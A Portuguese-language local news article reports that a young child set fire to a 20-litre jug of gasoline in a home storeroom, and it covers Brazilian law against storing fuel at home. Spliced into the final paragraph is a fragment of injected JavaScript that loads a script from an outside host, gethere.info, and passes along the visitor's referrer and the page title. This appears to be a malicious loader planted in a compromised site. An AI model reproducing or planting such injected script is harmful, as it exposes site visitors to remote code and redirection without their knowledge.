Capa / Cidades / Criança ateia fogo em galão de gasolina

Criança ateia fogo em galão de gasolina

Kariny Santos

Por pouco uma brincadeira de criança não acabou em tragédia no final da tarde de sexta-feira, 26, no bairro Jardim das Flores, uma criança de aproximadamente 07 anos ateou fogo em um galão de 20 litros que estava guardado em uma dispensa no fundo da casa.

Segundo o proprietário da residência Raimundo Sutero da Silva, 61 anos, ele e sua esposa haviam saído para realizar compras e seus netos estavam brincando, ao chegar ao mercado sua filha ligou para o mesmo comunicando que um dos seus netos havia ateado fogo no galão de 20 litros de gasolina que estavam na dispensa no fundo da sua residência.

O fogo foi controlado pelos Bombeiros Militar, apenas danos materiais foram registrados

ARMAZENAR COMBUSTÍVEL É PROIBIDO

De acordo com o artigo 56 da Lei 9.605/98, armazenar combustível ilegalmente é crime ambiental. Além do artigo, há a resolução nº 41, de 5 de novembro de 2013, da Agência Nacional de Petróleo (ANP) que reforça a proibição.

A gasolina é um líquido inflamável,  a maioria não conhece quais são os perigos de armazenar substâncias inflamáveis em casa. A cada ano, ocorre cerca de quinhentas mortes e milhares de ferimentos atribuídos ao uso incorreto e o armazenamento impróprio de gasolina no Brasil.

Muitos incêndios de gasolina podem ser causados acidentalmente por crianças desavisadas sobre os perigos da gasolina e de seus vapores inflamáveis.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Sobre Kariny Santos

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top